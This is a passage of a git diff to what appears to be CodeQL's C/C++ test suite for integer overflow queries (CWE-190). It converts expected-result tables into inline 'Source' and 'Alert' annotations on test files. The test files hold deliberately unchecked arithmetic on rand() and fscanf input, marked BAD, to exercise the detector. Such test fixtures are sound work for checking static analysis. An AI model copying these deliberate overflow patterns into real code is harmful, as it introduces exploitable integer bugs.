| -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:25:31:25:34 | data | examples.cpp:22:26:22:33 | call to rand | examples.cpp:25:31:25:34 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:22:26:22:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | -| examples.cpp:38:9:38:12 | data | examples.cpp:35:26:35:33 | call to rand | examples.cpp:38:9:38:12 | data | This arithmetic expression depends on an $@, potentially causing an underflow. | examples.cpp:35:26:35:33 | call to rand | uncontrolled value | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.qlref index 1fcafc3ca1c8..e18d0e08a87f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticUncontrolled.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticUncontrolled.ql +query: Security/CWE/CWE-190/ArithmeticUncontrolled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticWithExtremeValues.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticWithExtremeValues.qlref index ab2c35ce59b2..0109cee57cf7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticWithExtremeValues.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/ArithmeticWithExtremeValues.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticWithExtremeValues.ql +query: Security/CWE/CWE-190/ArithmeticWithExtremeValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/IntegerOverflowTainted.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/IntegerOverflowTainted.qlref index df42008c632b..419ed80f3b9e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/IntegerOverflowTainted.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/IntegerOverflowTainted.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/IntegerOverflowTainted.ql +query: Security/CWE/CWE-190/IntegerOverflowTainted.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/examples.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/examples.cpp index b2cdbbe7133f..3fab05fc20cb 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/examples.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/SAMATE/examples.cpp @@ -19,10 +19,10 @@ void CWE191_Integer_Underflow__unsigned_int_rand_sub_01_bad() unsigned int data; data = 0; /* POTENTIAL FLAW: Use a random value */ - data = (unsigned int)RAND32(); + data = (unsigned int)RAND32(); // $ Source[cpp/uncontrolled-arithmetic] { /* POTENTIAL FLAW: Subtracting 1 from data could cause an underflow */ - unsigned int result = data - 1; + unsigned int result = data - 1; // $ Alert[cpp/uncontrolled-arithmetic] printUnsignedLine(result); } } @@ -32,10 +32,10 @@ void CWE191_Integer_Underflow__unsigned_int_rand_postdec_01_bad() unsigned int data; data = 0; /* POTENTIAL FLAW: Use a random value */ - data = (unsigned int)RAND32(); + data = (unsigned int)RAND32(); // $ Source[cpp/uncontrolled-arithmetic] { /* POTENTIAL FLAW: Decrementing data could cause an underflow */ - data--; + data--; // $ Alert[cpp/uncontrolled-arithmetic] unsigned int result = data; printUnsignedLine(result); } @@ -60,10 +60,10 @@ void CWE191_Integer_Underflow__unsigned_int_fscanf_predec_01_bad() unsigned int data; data = 0; /* POTENTIAL FLAW: Use a value input from the console */ - fscanf (stdin, "%u", &data); + fscanf (stdin, "%u", &data); // $ Source[cpp/tainted-arithmetic] { /* POTENTIAL FLAW: Decrementing data could cause an underflow */ - --data; + --data; // $ Alert[cpp/integer-overflow-tainted] Alert[cpp/tainted-arithmetic] unsigned int result = data; printUnsignedLine(result); } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected index 97bd3603cd3c..c07119831d7e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.expected @@ -1,3 +1,31 @@ +#select +| test.c:21:17:21:17 | r | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:18:13:18:16 | call to rand | uncontrolled value | +| test.c:35:5:35:5 | r | test.c:34:13:34:18 | call to rand | test.c:35:5:35:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:34:13:34:18 | call to rand | uncontrolled value | +| test.c:45:5:45:5 | r | test.c:44:13:44:16 | call to rand | test.c:45:5:45:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:44:13:44:16 | call to rand | uncontrolled value | +| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | +| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | +| test.c:83:9:83:9 | r | test.c:81:14:81:17 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:14:81:17 | call to rand | uncontrolled value | +| test.c:83:9:83:9 | r | test.c:81:23:81:26 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:23:81:26 | call to rand | uncontrolled value | +| test.c:127:9:127:9 | r | test.c:125:13:125:16 | call to rand | test.c:127:9:127:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:125:13:125:16 | call to rand | uncontrolled value | +| test.c:133:5:133:5 | r | test.c:131:13:131:16 | call to rand | test.c:133:5:133:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:131:13:131:16 | call to rand | uncontrolled value | +| test.c:139:10:139:10 | r | test.c:137:13:137:16 | call to rand | test.c:139:10:139:10 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:137:13:137:16 | call to rand | uncontrolled value | +| test.c:157:9:157:9 | r | test.c:155:22:155:27 | call to rand | test.c:157:9:157:9 | r | This arithmetic expression depends on an $@, potentially causing an underflow. | test.c:155:22:155:25 | call to rand | uncontrolled value | +| test.cpp:25:7:25:7 | r | test.cpp:8:9:8:12 | call to rand | test.cpp:25:7:25:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:8:9:8:12 | call to rand | uncontrolled value | +| test.cpp:31:7:31:7 | r | test.cpp:13:10:13:13 | call to rand | test.cpp:31:7:31:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:13:10:13:13 | call to rand | uncontrolled value | +| test.cpp:37:7:37:7 | r | test.cpp:18:9:18:12 | call to rand | test.cpp:37:7:37:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:18:9:18:12 | call to rand | uncontrolled value | +| test.cpp:65:9:65:9 | x | test.cpp:62:19:62:24 | call to rand | test.cpp:65:9:65:9 | x | This arithmetic expression depends on an $@, potentially causing an underflow. | test.cpp:62:19:62:22 | call to rand | uncontrolled value | +| test.cpp:90:10:90:10 | x | test.cpp:86:10:86:13 | call to rand | test.cpp:90:10:90:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:86:10:86:13 | call to rand | uncontrolled value | +| test.cpp:102:10:102:10 | x | test.cpp:98:10:98:13 | call to rand | test.cpp:102:10:102:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:98:10:98:13 | call to rand | uncontrolled value | +| test.cpp:146:9:146:9 | y | test.cpp:137:10:137:13 | call to rand | test.cpp:146:9:146:9 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:137:10:137:13 | call to rand | uncontrolled value | +| test.cpp:154:10:154:10 | b | test.cpp:151:10:151:13 | call to rand | test.cpp:154:10:154:10 | b | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:151:10:151:13 | call to rand | uncontrolled value | +| test.cpp:171:11:171:16 | y | test.cpp:169:11:169:14 | call to rand | test.cpp:171:11:171:16 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:169:11:169:14 | call to rand | uncontrolled value | +| test.cpp:196:7:196:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:196:7:196:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:198:7:198:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:198:7:198:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:199:7:199:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:199:7:199:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | +| test.cpp:204:7:204:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:204:7:204:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:205:7:205:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:205:7:205:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:208:7:208:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:208:7:208:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | +| test.cpp:219:8:219:8 | x | test.cpp:215:11:215:14 | call to rand | test.cpp:219:8:219:8 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:215:11:215:14 | call to rand | uncontrolled value | edges | test.c:18:13:18:16 | call to rand | test.c:18:13:18:16 | call to rand | provenance | | | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | provenance | | @@ -146,31 +174,3 @@ nodes | test.cpp:215:11:215:14 | call to rand | semmle.label | call to rand | | test.cpp:219:8:219:8 | x | semmle.label | x | subpaths -#select -| test.c:21:17:21:17 | r | test.c:18:13:18:16 | call to rand | test.c:21:17:21:17 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:18:13:18:16 | call to rand | uncontrolled value | -| test.c:35:5:35:5 | r | test.c:34:13:34:18 | call to rand | test.c:35:5:35:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:34:13:34:18 | call to rand | uncontrolled value | -| test.c:45:5:45:5 | r | test.c:44:13:44:16 | call to rand | test.c:45:5:45:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:44:13:44:16 | call to rand | uncontrolled value | -| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | -| test.c:77:9:77:9 | r | test.c:75:13:75:19 | call to rand | test.c:77:9:77:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:75:13:75:19 | call to rand | uncontrolled value | -| test.c:83:9:83:9 | r | test.c:81:14:81:17 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:14:81:17 | call to rand | uncontrolled value | -| test.c:83:9:83:9 | r | test.c:81:23:81:26 | call to rand | test.c:83:9:83:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:81:23:81:26 | call to rand | uncontrolled value | -| test.c:127:9:127:9 | r | test.c:125:13:125:16 | call to rand | test.c:127:9:127:9 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:125:13:125:16 | call to rand | uncontrolled value | -| test.c:133:5:133:5 | r | test.c:131:13:131:16 | call to rand | test.c:133:5:133:5 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:131:13:131:16 | call to rand | uncontrolled value | -| test.c:139:10:139:10 | r | test.c:137:13:137:16 | call to rand | test.c:139:10:139:10 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.c:137:13:137:16 | call to rand | uncontrolled value | -| test.c:157:9:157:9 | r | test.c:155:22:155:27 | call to rand | test.c:157:9:157:9 | r | This arithmetic expression depends on an $@, potentially causing an underflow. | test.c:155:22:155:25 | call to rand | uncontrolled value | -| test.cpp:25:7:25:7 | r | test.cpp:8:9:8:12 | call to rand | test.cpp:25:7:25:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:8:9:8:12 | call to rand | uncontrolled value | -| test.cpp:31:7:31:7 | r | test.cpp:13:10:13:13 | call to rand | test.cpp:31:7:31:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:13:10:13:13 | call to rand | uncontrolled value | -| test.cpp:37:7:37:7 | r | test.cpp:18:9:18:12 | call to rand | test.cpp:37:7:37:7 | r | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:18:9:18:12 | call to rand | uncontrolled value | -| test.cpp:65:9:65:9 | x | test.cpp:62:19:62:24 | call to rand | test.cpp:65:9:65:9 | x | This arithmetic expression depends on an $@, potentially causing an underflow. | test.cpp:62:19:62:22 | call to rand | uncontrolled value | -| test.cpp:90:10:90:10 | x | test.cpp:86:10:86:13 | call to rand | test.cpp:90:10:90:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:86:10:86:13 | call to rand | uncontrolled value | -| test.cpp:102:10:102:10 | x | test.cpp:98:10:98:13 | call to rand | test.cpp:102:10:102:10 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:98:10:98:13 | call to rand | uncontrolled value | -| test.cpp:146:9:146:9 | y | test.cpp:137:10:137:13 | call to rand | test.cpp:146:9:146:9 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:137:10:137:13 | call to rand | uncontrolled value | -| test.cpp:154:10:154:10 | b | test.cpp:151:10:151:13 | call to rand | test.cpp:154:10:154:10 | b | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:151:10:151:13 | call to rand | uncontrolled value | -| test.cpp:171:11:171:16 | y | test.cpp:169:11:169:14 | call to rand | test.cpp:171:11:171:16 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:169:11:169:14 | call to rand | uncontrolled value | -| test.cpp:196:7:196:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:196:7:196:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:198:7:198:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:198:7:198:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:199:7:199:7 | x | test.cpp:189:10:189:13 | call to rand | test.cpp:199:7:199:7 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:189:10:189:13 | call to rand | uncontrolled value | -| test.cpp:204:7:204:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:204:7:204:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:205:7:205:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:205:7:205:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:208:7:208:7 | y | test.cpp:190:10:190:13 | call to rand | test.cpp:208:7:208:7 | y | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:190:10:190:13 | call to rand | uncontrolled value | -| test.cpp:219:8:219:8 | x | test.cpp:215:11:215:14 | call to rand | test.cpp:219:8:219:8 | x | This arithmetic expression depends on an $@, potentially causing an overflow. | test.cpp:215:11:215:14 | call to rand | uncontrolled value | diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.qlref index 1fcafc3ca1c8..e18d0e08a87f 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/ArithmeticUncontrolled.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticUncontrolled.ql +query: Security/CWE/CWE-190/ArithmeticUncontrolled.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.c index 691801a620a5..77c4ace01e75 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.c @@ -15,10 +15,10 @@ void add_100(int); void randomTester() { int i; for (i = 0; i < 1000; i++) { - int r = rand(); + int r = rand(); // $ Source // BAD: The return from rand() is unbounded - trySlice(r, r+100); + trySlice(r, r+100); // $ Alert } for (i = 0; i < 1000; i++) { @@ -31,8 +31,8 @@ void randomTester() { } { - int r = RAND(); - r += 100; // BAD: The return from RAND() is unbounded + int r = RAND(); // $ Source + r += 100; // BAD: The return from RAND() is unbounded // $ Alert } { @@ -41,8 +41,8 @@ void randomTester() { } { - int r = rand(); - r += 100; // BAD + int r = rand(); // $ Source + r += 100; // BAD // $ Alert } { @@ -72,15 +72,15 @@ void randomTester() { } { - int r = RAND2(); + int r = RAND2(); // $ Source - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } { - int r = (rand() ^ rand()); + int r = (rand() ^ rand()); // $ Source - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } { @@ -122,21 +122,21 @@ void randomTester2(int bound, int min, int max) { void moreTests() { { - int r = rand(); + int r = rand(); // $ Source - r = r * 100; // BAD + r = r * 100; // BAD // $ Alert } { - int r = rand(); + int r = rand(); // $ Source - r *= 100; // BAD + r *= 100; // BAD // $ Alert } { - int r = rand(); + int r = rand(); // $ Source int v = 100; - v *= r; // BAD + v *= r; // BAD // $ Alert } { @@ -152,9 +152,9 @@ void moreTests() { } { - unsigned int r = rand(); + unsigned int r = rand(); // $ Source - r = r - 100; // BAD + r = r - 100; // BAD // $ Alert } } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.cpp b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.cpp index f5e401c60cde..58f37f152cfd 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.cpp +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticUncontrolled/test.cpp @@ -5,36 +5,36 @@ int rand(void); int get_rand() { - return rand(); + return rand(); // $ Source } void get_rand2(int *dest) { - *dest = rand(); + *dest = rand(); // $ Source } void get_rand3(int &dest) { - dest = rand(); + dest = rand(); // $ Source } void randomTester2() { { int r = get_rand(); - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } { int r; get_rand2(&r); - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } { int r; get_rand3(r); - r = r + 100; // BAD + r = r + 100; // BAD // $ Alert } } @@ -59,10 +59,10 @@ int test_remainder_subtract() unsigned int test_remainder_subtract_unsigned() { - unsigned int x = rand(); + unsigned int x = rand(); // $ Source unsigned int y = x % 100; // y <= x - return x - y; // GOOD (as y <= x) [FALSE POSITIVE] + return x - y; // GOOD (as y <= x) [FALSE POSITIVE] // $ Alert } typedef unsigned long size_t; @@ -83,11 +83,11 @@ int test_snprintf(char *buf, size_t buf_sz) int test_else_1() { - int x = rand(); + int x = rand(); // $ Source if (x > 100) { - return x * 10; // BAD + return x * 10; // BAD // $ Alert } else { return x * 10; // GOOD (as x <= 100) } @@ -95,11 +95,11 @@ int test_else_1() int test_else_2() { - int x = rand(); + int x = rand(); // $ Source if (x > 100) { - return x * 10; // BAD + return x * 10; // BAD // $ Alert } return x * 10; // GOOD (as x <= 100) @@ -134,7 +134,7 @@ int test_conditional_assignment_2() int test_conditional_assignment_3() { - int x = rand(); + int x = rand(); // $ Source int y = 100; int c = 10; @@ -143,15 +143,15 @@ int test_conditional_assignment_3() y = x; } - return y * c; // GOOD (as y <= 100) [FALSE POSITIVE] + return y * c; // GOOD (as y <= 100) [FALSE POSITIVE] // $ Alert } int test_underflow() { - int x = rand(); + int x = rand(); // $ Source int a = -x; // GOOD int b = 10 - x; // GOOD - int c = b * 2; // BAD + int c = b * 2; // BAD // $ Alert } int test_cast() @@ -166,9 +166,9 @@ int test_cast() void test_float() { { - int x = rand(); + int x = rand(); // $ Source float y = x; // GOOD - int z = (int)y * 5; // BAD + int z = (int)y * 5; // BAD // $ Alert } { @@ -186,37 +186,37 @@ void test_float() void test_if_const_bounded() { - int x = rand(); - int y = rand(); + int x = rand(); // $ Source + int y = rand(); // $ Source int c = 10; if (x < 1000) { x = x * 2; // GOOD - x = x * c; // GOOD [FALSE POSITIVE] + x = x * c; // GOOD [FALSE POSITIVE] // $ Alert } else { - x = x * 2; // BAD - x = x * c; // BAD + x = x * 2; // BAD // $ Alert + x = x * c; // BAD // $ Alert } if (y > 1000) { - y = y * 2; // BAD - y = y * c; // BAD + y = y * 2; // BAD // $ Alert + y = y * c; // BAD // $ Alert } else { y = y * 2; // GOOD - y = y * c; // GOOD [FALSE POSITIVE] + y = y * c; // GOOD [FALSE POSITIVE] // $ Alert } } void test_mod_limit() { { - int x = rand(); + int x = rand(); // $ Source int y = 100; int z; - z = (x + y) % 1000; // BAD + z = (x + y) % 1000; // BAD // $ Alert } { diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/ArithmeticWithExtremeValues.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/ArithmeticWithExtremeValues.qlref index ab2c35ce59b2..0109cee57cf7 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/ArithmeticWithExtremeValues.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/ArithmeticWithExtremeValues.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ArithmeticWithExtremeValues.ql +query: Security/CWE/CWE-190/ArithmeticWithExtremeValues.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/test.c index 8760641c8e2d..d4fa29deaf97 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ArithmeticWithExtremeValues/test.c @@ -14,7 +14,7 @@ int len_last(int n, char** lines) { } // BAD: if the input array is empty, then max will still be INT_MAX - return min + 1; + return min + 1; // $ Alert } @@ -45,9 +45,9 @@ void test_crement() { sc1 = CHAR_MIN; sc1++; // GOOD sc2 = CHAR_MIN; - sc2--; // BAD + sc2--; // BAD // $ Alert sc3 = CHAR_MAX; - sc3++; // BAD + sc3++; // BAD // $ Alert sc4 = CHAR_MAX; sc4--; // GOOD @@ -56,11 +56,11 @@ void test_crement() { sc5++; // GOOD [FALSE POSITIVE] sc6 = CHAR_MAX; - sc6 += 1; // BAD + sc6 += 1; // BAD // $ Alert sc7 = CHAR_MAX; sc7 -= 1; // GOOD sc8 = CHAR_MIN; - sc8 -= 1; // BAD + sc8 -= 1; // BAD // $ Alert sc9 = CHAR_MIN; sc9 += 1; // GOOD @@ -121,5 +121,5 @@ void test_guards4(int cond) { if (x == 0) return; - return x + 1; // BAD + return x + 1; // BAD // $ Alert } diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/ComparisonWithWiderType.qlref b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/ComparisonWithWiderType.qlref index 4a71f8aad4ca..f836a00c9c4e 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/ComparisonWithWiderType.qlref +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/ComparisonWithWiderType.qlref @@ -1 +1,2 @@ -Security/CWE/CWE-190/ComparisonWithWiderType.ql +query: Security/CWE/CWE-190/ComparisonWithWiderType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/test.c b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/test.c index 8361ae3e31b5..e22cce3c2a1d 100644 --- a/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/test.c +++ b/cpp/ql/test/query-tests/Security/CWE/CWE-190/semmle/ComparisonWithWiderType/test.c @@ -1,17 +1,17 @@ void test1 (int x) { char c; - for (c = 0; c < x; c++) {} //BAD + for (c = 0; c < x; c++) {} //BAD // $ Alert } void test2 (int x) { char c; - for (c = 0; x > c; c++) {} // BAD + for (c = 0; x > c; c++) {} // BAD // $ Alert } void test3 (int x) { short s; - for (s = 0; s < x; s++) {} //BAD + for (s = 0; s < x; s++) {} //BAD // $ Alert } void runner() { // get range analysis to give large values to x in tests @@ -39,7 +39,7 @@ void test5 () { void test6() { short s1; - for (s1 = 0; s1 < 0x0000ffff; s1++) {} // BAD + for (s1 = 0; s1 < 0x0000ffff; s1++) {} // BAD // $ Alert } void test7(long long l) { @@ -62,7 +62,7 @@ void test9(int x) { void test10(int x) { short s; - for (s = 0; s < x; ) { // BAD + for (s = 0; s < x; ) { // BAD // $ Alert do { s++; @@ -84,27 +84,27 @@ void test12() { unsigned int x; x = get_a_uint(); - for (c = 0; c < x; c++) {} // BAD + for (c = 0; c < x; c++) {} // BAD // $ Alert x = get_a_uint(); for (c = 0; c < 0xFF; c++) {} // GOOD x = get_a_uint(); - for (c = 0; c < 0xFF00; c++) {} // BAD + for (c = 0; c < 0xFF00; c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < 0xFF0000; c++) {} // BAD + for (c = 0; c < 0xFF0000; c++) {} // BAD // $ Alert x = get_a_uint(); - for (c = 0; c < 0xFF000000; c++) {} // BAD + for (c = 0; c < 0xFF000000; c++) {} // BAD // $ Alert x = get_a_uint(); for (c = 0; c < (x & 0xFF); c++) {} // GOOD x = get_a_uint(); - for (c = 0; c < (x & 